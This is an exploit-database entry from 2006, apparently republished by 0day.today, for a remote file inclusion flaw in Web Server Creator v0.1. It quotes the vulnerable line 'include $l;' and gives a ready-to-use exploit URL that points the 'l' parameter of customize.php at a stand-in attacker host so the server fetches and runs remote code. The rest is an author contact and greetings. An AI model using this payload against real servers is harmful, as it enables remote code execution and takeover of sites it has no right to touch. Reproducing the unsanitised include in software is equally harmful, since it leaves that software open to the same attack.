id: 795
date: 09/06/2006
title: Web Server Creator v0.1 (l) Remote Include Vulnerability
author: xoron
cves: 

========================================================
Web Server Creator v0.1 (l) Remote Include Vulnerability
========================================================



###########################################################

#Web Server Creator v0.1 (l) Remote Include Vulnerability

############################################################

#Author: XORON


############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:   include $l;

############################################################

#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?

############################################################

#Greetz: Ironfist, Preddy, SHiKaA,  geltekin

############################################################




#  0day.today [2023-03-22]  #